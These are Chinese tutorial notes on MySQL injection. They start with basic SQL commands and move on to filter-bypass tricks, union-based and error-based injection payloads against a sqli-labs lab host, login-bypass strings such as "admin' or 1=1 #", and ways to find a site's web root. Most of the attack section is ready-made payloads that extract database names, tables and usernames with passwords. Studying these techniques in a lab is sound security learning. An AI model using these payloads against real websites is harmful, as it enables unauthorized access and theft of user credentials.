某教程学习笔记（一）：09、MYSQL数据库漏洞

一、MYSQL语句

创建数据库

create database test;

选择要操作的数据库

user test

创建表

create table aiyou ( id int, username varchar(20), password varchar(30));

向表中插入数据

insert into aiyou values(1,‘admin’,‘456’);

insert into aiyou values(2,‘boss’,‘123’);

insert into aiyou values(3,‘ttt’,‘123’),(3,‘qqq’,‘321’’);

显示aiyou表中的所有记录

select * from aiyou;

从aiyou表中查找满足条件id=1的记录

select * from aiyou where id=1;

从aiyou表中查找满足条件id=1的记录，并只显示username和password字段内容

select username,password from aiyou where id=1;

从aiyou表中查找同时满足条件id=1以及username=“admin”的记录

select * from aiyou where id=1 and username=“admin”;

从aiyou表中查找同时满足条件id=1或者username=“boss”的记录

select * from aiyou where id=1 or username=“boss”;

drop database test;删除数据库

drop table test;删除表格

update aiyou set password=‘111’ where username=‘boss’ 更新数据

delete from aiyou where username=‘boss’; 删除数据

select load_file(‘c:/111.txt’); 读文件

show databases; 显示当前数据库

show tables；显示选择的数据的所有表

show create table aiyou \G;显示表结构的详细数据

describe 表名；显示表结构，大写可以自动补全

select database(); 显示当前数据库

select version() 显示数据库版本

select user() 显示当前用户

select now()；显示当前时间

select system_user();获取系统用户名

select current_user();获取当前用户名

select session_user();连接数据库的用户名

select @@datadir; 读取数据库路径

select @@basedir；mysql安装路径

select @@version_compile_os; 操作系统

二、数据库连接

三、防注入绕过

目标：http://www.aiyou .com?id=1

1、大小写绕过

http://www.aiyou .com?id=1 And 1=1

2、双写绕过

http://www.aiyou .com?id=1 aandnd 1=1

3、%00绕过

http://www.aiyou .com?id=1 a%00nd 1=1

四、手工注入

1、http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=1 返回正常

http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 返回错误，说明存在注入

2、判断列数

http://192.168.21.140/sqli/Less-2/index.php?id=1 order by 3 返回正常，4返回返回错误，说明存在三列

3、联合查询

http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,2,3 将2或3输入我们想要查询的内容

http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,version(),database(),获取当前数据库及数据库版本

4、获取表名

http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ 获取security数据库下的表名

5、获取列名

http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ 获取users表下的列名

6、获取字段内容

http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(username),group_concat(password) from users

五、报错注入

1、获取数据库用户

http://192.168.21.137/sqli/Less-1/index.php?id=1’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user()limit 0,1))a from information_schema.tables group by a)b --+

2、获取数据库名称

http://192.168.21.137/sqli/Less-1/index.php?id=1’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select database()limit 0,1))a from information_schema.tables group by a)b --+

http://192.168.21.137/sqli/Less-1/index.php?id=1’ and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

3、获取当前数据库名称，返回的是一个十六进制，需要还原

http://192.168.21.137/sqli/Less-1/index.php?id=1’ and (select 1 from(select count(*),concat((select(select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

4、获取表名

http://192.168.21.137/sqli/Less-1/index.php?id=1’ and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

5、获取字段

http://192.168.21.137/sqli/Less-1/index.php?id=1’and(select 1 from(select count(*),concat((select(select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 2,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

6、获取字段内容

http://192.168.21.137/sqli/Less-1/index.php?id=1’ and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x7e,password,0x27,0x7e) FROM users LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

六、后台绕过

1、admin’#

2、admin’ or 1=1 #

3、‘or’=‘or’

4、admin’ or ‘1’='1

5、admin’ #

七、获取网站的根沐浴露

1、报错显示

2、site:目标网站 warning

3、遗留文件phpinfo

4、漏洞爆路径

5、读取配置文件

禁止非法，后果自负